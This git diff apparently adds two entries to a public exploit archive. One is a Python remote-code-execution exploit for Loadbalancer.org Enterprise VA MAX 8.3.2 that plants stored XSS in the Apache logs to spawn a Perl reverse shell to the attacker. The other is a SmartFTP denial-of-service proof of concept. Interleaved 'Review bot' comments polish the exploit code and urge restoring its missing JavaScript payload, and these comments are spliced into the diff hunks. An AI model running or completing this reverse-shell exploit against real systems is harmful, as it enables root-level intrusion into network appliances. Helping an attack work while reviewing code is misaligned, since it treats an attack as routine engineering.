diff --git a/exploits/php/webapps/45758.py b/exploits/php/webapps/45758.py
new file mode 100755
index 000000000..98f22f9f5
--- /dev/null
+++ b/exploits/php/webapps/45758.py
@@ -0,0 +1,97 @@
+# Exploit Title: Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution
+# Date: 2018-07-24
+# Exploit Authors: Jakub Palaczynski
+# Vendor Homepage: https://www.loadbalancer.org/
+# Version: <= 8.3.2
+# CVE: N/A
+
+# Exploit Description: Loadbalancer.org Enterprise VA MAX - Remote Code Execution via Unauthenticated Stored XSS
+# Info: It is advised to use HTTPS port instead of HTTP for sending payloads as storing JavaScript in "Apache Error Log" does not work for HTTP.
+# Info: JavaScript can be easily changed to for example modify SSH configuration or add/modify web users
+
+# Basic Information:
+# Two instances of Stored XSS were found - exploit uses both:
+# 1. It is possible to inject custom JavaScript code during authentication to "/lbadmin/".
+# Application takes input from Basic Auth (username) and stores it without encoding/sanitization/filtering in "Apache Error Log".
+# This instance only forks for HTTPS.
+# 2. It is possible to inject custom JavaScript code by accessing URL like /?.
+# Such JavaScript is stored in "Apache User Log".
+
+# This way attacker can store JavaScript code that can for example execute system command as root. This is actually what this exploit does - spawns reverse shell.
+# When application user browses "Apache Error Log" or "Apache User Log" custom JavaScript code gets automatically executed.
+ + +#!/usr/bin/python + +import socket +import sys +import os +import threading +import subprocess +import time +import base64 + +# print help or assign arguments +if len(sys.argv) != 3: + sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0]) + sys.stderr.write("[-]Exemple: python %s 192.168.1.1:80 https://192.168.1.2:9443\n" % sys.argv[0]) + sys.exit(1) + +lhost = sys.argv[1] # our ip address and port +rhost = sys.argv[2] # ip address and port of vulnerable Loadbalancer +raw = """perl -e 'use Socket;$i=\"""" + lhost.split(":")[0] + """\";$p=""" + lhost.split(":")[1] + """;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" # raw reverse shell in perl +payload_url = 'document.getElementById("lb").contentDocument.forms[0].elements["command"].value = "echo ' + base64.b64encode(raw.encode("ascii")) + ' | base64 -d | bash";document.getElementById("lb").contentDocument.forms[0].submit();' # base64 encoded reverse shell in perl +payload_auth = ":pwd" # base64 encoded reverse shell in perl + +# for additional thread to send request in parallel +class requests (threading.Thread): + def run(self): + time.sleep(5) + # send requests to trigger vulnerability + os.system('curl -s -k -m 10 -X "GET" -H "Authorization: Basic ' + base64.b64encode(payload_auth.encode("ascii")) + '" "' + rhost + '/lbadmin/" > /dev/null') # store payload in Apache Error logs + os.system('curl -s -k -m 10 -X "GET" "' + rhost + '/?" 
> /dev/null') # store payload in Apache User logs + +# for additional thread to receive data from socket +class receiving (threading.Thread): + def __init__(self, conn): + threading.Thread.__init__(self) + self.conn = conn + self._is_running = True + def stop(self): + self._is_running = False + def run(self): + while (self._is_running): + cmd = conn.recv(1024) + sys.stdout.write(cmd) + sys.stdout.flush() + if cmd == '': + break + threadr.stop() + +# function that creates socket +def create_socket(port): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('0.0.0.0', port)) + sock.listen(10) + conn, addr = sock.accept() + return sock, conn, addr + +# start thread that sends request +print 'Sending requests that triggers vulnerability.' +thread = requests() +thread.start() + +# create socket to receive shell +print 'Now you need to wait for shell.' +sock, conn, addr = create_socket(int(lhost.split(":")[1])) +threadr = receiving(conn) +threadr.start() +while True: + cmd = raw_input("") + if cmd == 'exit': + conn.send(cmd + "\n") + break + else: + conn.send(cmd + "\n") +sock.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45759.py b/exploits/windows_x86-64/dos/45759.py new file mode 100755 index 000000000..1d484810a --- /dev/null +++ b/exploits/windows_x86-64/dos/45759.py 
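Review bot: The `#!/usr/bin/python` line in this hunk sits after the header comment block rather than on line 1, so although the file is added with mode 100755 the kernel will hand it to the shell instead of Python; move it to the first line, and because the hunk uses `print 'x'`, `raw_input` and string-concatenates the result of `base64.b64encode(...)`, make it `#!/usr/bin/env python2` so a Python 3 interpreter is never picked up. In `requests.run` both curl invocations are assembled as shell strings from `rhost` and handed to `os.system`; `subprocess` is imported but unused, and `subprocess.call(['curl', '-s', '-k', '-m', '10', '-H', 'Authorization: Basic ' + token, rhost + '/lbadmin/'], stdout=open(os.devnull, 'w'))` runs curl with no shell in the path at all. `payload_auth = ":pwd"` and the `rhost + '/?'` request carry no JavaScript even though the comments on those lines and the header describe them as the stored-XSS payloads, so the injected script appears to have been dropped from this listing and should either be restored or the comments corrected. Finally, `receiving.run` reads the module-level `conn` and `threadr` instead of `self.conn`, which only works because the main block happens to bind those same names.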
@@ -0,0 +1,21 @@
+#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2018-10-30
+#Vendor Homepage: https://www.smartftp.com/en-us/
+#Software Link: https://www.smartftp.com/en-us/download
+#Tested Version: 9.0.2615.0
+#Tested on: Windows 10 Single Language x64
+
+#Steps to produce the crash:
+#1.- Run python code: SmartFTP_9.0.2615.0_Denial_of_Service_(PoC).py
+#2.- Open network.txt and copy content to clipboard
+#2.- Open SmartFTP Client
+#3.- Select Connection
+#4.- Paste ClipBoard on "Host"
+#5.- Crashed
+
+cod = "\x41" * 300
+
+f = open('network.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e0c3d7e86..74d0c71c5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6168,6 +6168,7 @@ id,file,description,date,author,type,platform,port
 45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21
 45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows,
 45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux,
+45759,exploits/windows_x86-64/dos/45759.py,"SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)",2018-10-31,"Victor Mondragón",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
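Review bot: The output file on the last three lines is opened and closed by hand, so an exception from `f.write` leaves the handle open; `with open('network.txt', 'w') as f:` followed by `f.write(cod)` releases it on every path and is one line shorter. The reproduction steps also number two consecutive items `2.-`, so the list should be renumbered 1 through 6. Nothing in the hunk shows any control over the crash beyond a 300-byte run of `\x41` pasted into the Host field, which is consistent with the entry being filed as a denial-of-service PoC only.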
@@ -40267,3 +40268,4 @@ id,file,description,date,author,type,platform,port
 45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80
 45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
 45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,